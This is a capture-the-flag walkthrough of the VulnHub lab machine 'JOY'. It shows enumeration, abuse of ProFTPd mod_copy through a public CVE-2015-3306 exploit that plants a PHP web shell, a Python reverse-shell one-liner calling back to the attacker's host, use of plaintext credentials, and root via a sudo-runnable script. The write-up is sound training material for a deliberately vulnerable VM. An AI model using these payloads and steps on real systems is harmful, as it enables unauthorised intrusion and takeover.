28 September 2022

Pentesting Fun Stuff

following the cyber security path…

Digitalworld.local: JOY

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

nmap scan for open ports + services

```
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 The Good Tech Inc. FTP Server
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES TOP SASL AUTH-RESP-CODE PIPELINING STLS UIDL CAPA
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LITERAL+ capabilities more LOGIN-REFERRALS have LOGINDISABLEDA0001 post-login STARTTLS IDLE Pre-login SASL-IR IMAP4rev1 listed OK ENABLE ID
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-01-27T17:23:23
| Not valid after: 2032-10-05T17:23:23
| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0
|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Issuer: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-01-27T17:23:23
| Not valid after: 2032-10-05T17:23:23
| MD5: c8f9 a1cb ac3b baa1 f158 2916 d7bd d3b0
|_SHA-1: 5df6 1fce d31e e8c4 9bd9 b5b7 27fa 4f28 cfb9 34c6
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.91%I=7%D=5/1%Time=608D1EE9%P=x86_64-pc-linux-gnu%r(Gener
SF:icLines,7F,"220\x20The\x20Good\x20Tech\x20Inc\.\x20FTP\x20Server\r\n500
SF:\x20Invalid\x20command:\x20try\x20being\x20more\x20creative\r\n500\x20I
SF:nvalid\x20command:\x20try\x20being\x20more\x20creative\r\n");
MAC Address: 00:0C:29:C0:74:CD (VMware)
Service Info: Hosts: JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m01s, deviation: 4h37m07s, median: -1s
| nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| JOY<00> Flags: <unique><active>
| JOY<03> Flags: <unique><active>
| JOY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-05-01T17:27:22+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-01T09:27:22
|_ start_date: N/A
```

SMB

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ enum4linux 192.168.58.137
...[SNIP]...

S-1-22-1-1000 Unix User\patrick (Local User)
S-1-22-1-1001 Unix User\ftp (Local User)
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ smbmap -R -H 192.168.58.137
[+] Guest session IP: 192.168.58.137:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.5.12-Debian)
```

FTP

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ ftp
ftp> open 192.168.58.137
Connected to 192.168.58.137.
220 The Good Tech Inc. FTP Server
Name (192.168.58.137:n0w4n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 2110 May 1 09:36 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
```

Downloading all files

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ wget -r ftp://anonymous:pass@192.168.58.137/upload/
```

Result:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]
└─$ ls -lah
total 60K
drwxr-xr-x 2 n0w4n n0w4n 4.0K May 1 11:37 .
drwxr-xr-x 3 n0w4n n0w4n 4.0K May 1 11:37 ..
-rw-r--r-- 1 n0w4n n0w4n 2.1K May 1 09:36 directory
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_armadillo
-rw-r--r-- 1 n0w4n n0w4n 25 Jan 6 2019 project_bravado
-rw-r--r-- 1 n0w4n n0w4n 88 Jan 6 2019 project_desperado
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_emilio
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_flamingo
-rw-r--r-- 1 n0w4n n0w4n 7 Jan 6 2019 project_indigo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_komodo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_luyano
-rw-r--r-- 1 n0w4n n0w4n 8 Jan 6 2019 project_malindo
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_okacho
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_polento
-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_ronaldinho
-rw-r--r-- 1 n0w4n n0w4n 55 Jan 6 2019 project_sicko
-rw-r--r-- 1 n0w4n n0w4n 57 Jan 6 2019 project_toto
-rw-r--r-- 1 n0w4n n0w4n 5 Jan 6 2019 project_uno
-rw-r--r-- 1 n0w4n n0w4n 9 Jan 6 2019 project_vivino
-rw-r--r-- 1 n0w4n n0w4n 0 Jan 6 2019 project_woranto
-rw-r--r-- 1 n0w4n n0w4n 20 Jan 6 2019 project_yolo
-rw-r--r-- 1 n0w4n n0w4n 180 Jan 6 2019 project_zoo
-rw-r--r-- 1 n0w4n n0w4n 24 Jan 6 2019 reminder
```

Reading all the files

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137/upload]
└─$ for i in $(ls); do echo -e "\nFiles ${i}:" && cat ${i}; done

Files directory:
Patrick's Directory

total 112
drwxr-xr-x 18 patrick patrick 4096 May 1 17:35 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
-rw-r--r-- 1 patrick patrick 0 May 1 17:35 daqXrKzBXEAioPed3hhUH77s3i1JBNsx.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 May 1 17:30 hXtY5duoaey2PEbG67z04d4ryycBKBfw.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 May 1 17:30 IUdSCvOu4GrXPvG16AifVYjMrO2JFRRgzqKdM56ojxsTsiaWXVO6lTNeKc1tQbE0.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 May 1 17:35 S1LuMxniGge5pjszHuwwbrRN2ToI6jOIlRL5uk3iXFgrMd8FA9iDVFH65gkXXOCV.txt
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

Files project_armadillo:

Files project_bravado:
This is a brave project!

Files project_desperado:
What happens when you have no idea what you are doing? Bang your head against the wall.

Files project_emilio:

Files project_flamingo:

Files project_indigo:
colour

Files project_komodo:

Files project_luyano:

Files project_malindo:
airline

Files project_okacho:

Files project_polento:

Files project_ronaldinho:
skilled footballer!

Files project_sicko:
Perhaps the head of development is secretly a sicko...

Files project_toto:
either a dog name, or the name of a lottery in singapore

Files project_uno:
ONE!

Files project_vivino:
wine app

Files project_woranto:

Files project_yolo:
you only live once!

Files project_zoo:
dog
cat
ant
bird
fish
hare
snake
mouse
eagle
rabbit
jaguar
python
penguin
peacock
phoenix
kangaroo
parakeet
mosquito
mousedeer
woodlouse
cockroach
kingfisher
rhinoceros
pondskater

Files reminder:
Lock down this machine!
```

The file `version_control` in patrick's home directory looks interesting.
From the SMB enumeration we know there is a user `ftp`.
So copying this file from the home folder of patrick to the `upload` folder in the home folder of `ftp` should make it readable over anonymous FTP.

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ nc 192.168.58.137 21
220 The Good Tech Inc. FTP Server
site cpfr /home/patrick/version_control
350 File or directory exists, ready for destination name
site cpto /home/ftp/upload/version_control
250 Copy successful
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ ftp
ftp> open 192.168.58.137
Connected to 192.168.58.137.
220 The Good Tech Inc. FTP Server
Name (192.168.58.137:n0w4n): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd upload
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 3524 May 1 10:12 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
-rw-r--r-- 1 0 0 407 May 1 10:09 version_control
226 Transfer complete
ftp> get version_control
local: version_control remote: version_control
200 PORT command successful
150 Opening BINARY mode data connection for version_control (407 bytes)
226 Transfer complete
407 bytes received in 0.00 secs (5.2452 MB/s)
ftp> bye
221 Goodbye.
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy/192.168.58.137]
└─$ cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
```

Several public exploits for this ProFTPd version can be found on the internet.
This is the one I'm using: https://github.com/t0kx/exploit-CVE-2015-3306

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ ./exploit.py --host 192.168.58.137 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.58.137:21
[+] Target exploited, acessing shell at http://192.168.58.137/backdoor.php
[+] Running whoami: www-data
[+] Done
```

The Python script shows which query parameter the backdoor expects:

```
data = requests.get("http://" + self.__host + "/backdoor.php?cmd=whoami")
```
```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ curl -s http://192.168.58.137/backdoor.php?cmd=id
proftpd: 192.168.58.128:43890: SITE cpto /tmp/.uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
```

Getting a reverse shell with this backdoor

Payload:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Result:

```
┌──(n0w4n㉿cyberlab)-[~/ctf/joy]
└─$ sudo nc -lvp 9999
[sudo] password for n0w4n:
listening on [any] 9999 ...
192.168.58.137: inverse host lookup failed: Host name lookup failure
connect to [192.168.58.128] from (UNKNOWN) [192.168.58.137] 47188
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
```

Time for the recon phase

```
www-data@JOY:/var/www/tryingharderisjoy$ cd ossec
cd ossec
www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -lah
ls -lah
total 116K
drwxr-xr-x 8 www-data www-data 4.0K Jan 6 2019 .
drwxr-xr-x 3 www-data www-data 4.0K May 1 18:30 ..
-rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags
-rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd
-rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB
-rw-r--r-- 1 www-data www-data 35K Jul 19 2016 LICENSE
-rw-r--r-- 1 www-data www-data 2.1K Jul 19 2016 README
-rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search
drwxr-xr-x 3 www-data www-data 4.0K Jul 19 2016 css
-rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 img
-rwxr-xr-x 1 www-data www-data 5.1K Jul 19 2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Jul 19 2016 js
drwxr-xr-x 3 www-data www-data 4.0K Dec 28 2018 lib
-rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php
-rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy
-rwxr-xr-x 1 www-data www-data 2.5K Jul 19 2016 setup.sh
drwxr-xr-x 2 www-data www-data 4.0K Dec 28 2018 site
drwxrwxrwx 2 www-data www-data 4.0K Dec 28 2018 tmp
www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
```
```
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick
su patrick
Password: apollo098765

patrick@JOY:/var/www/tryingharderisjoy/ossec$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
```
```
patrick@JOY:/var/www/tryingharderisjoy/ossec$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
```

First get access to the `script` folder, which the directory listing showed as `d---------` and owned by root:

```
patrick@JOY:~$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../script/
../script/
What permissions would you like to set the file to?
777
777
Currently changing file permissions, please wait.
Tidying up...
Done!
```

Then change the content of the file `test` and run it with the sudo command:

```
patrick@JOY:~/script$ echo '#!/bin/bash' > test
echo '#!/bin/bash' > test
patrick@JOY:~/script$ echo '/bin/bash' >> test
echo '/bin/bash' >> test
patrick@JOY:~/script$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
root@JOY:/home/patrick/script# id
id
uid=0(root) gid=0(root) groups=0(root)
```

Final part

```
root@JOY:/home/patrick/script# cat /root/proof.txt
cat /root/proof.txt
Never grant sudo permissions on scripts that perform system functions!
```
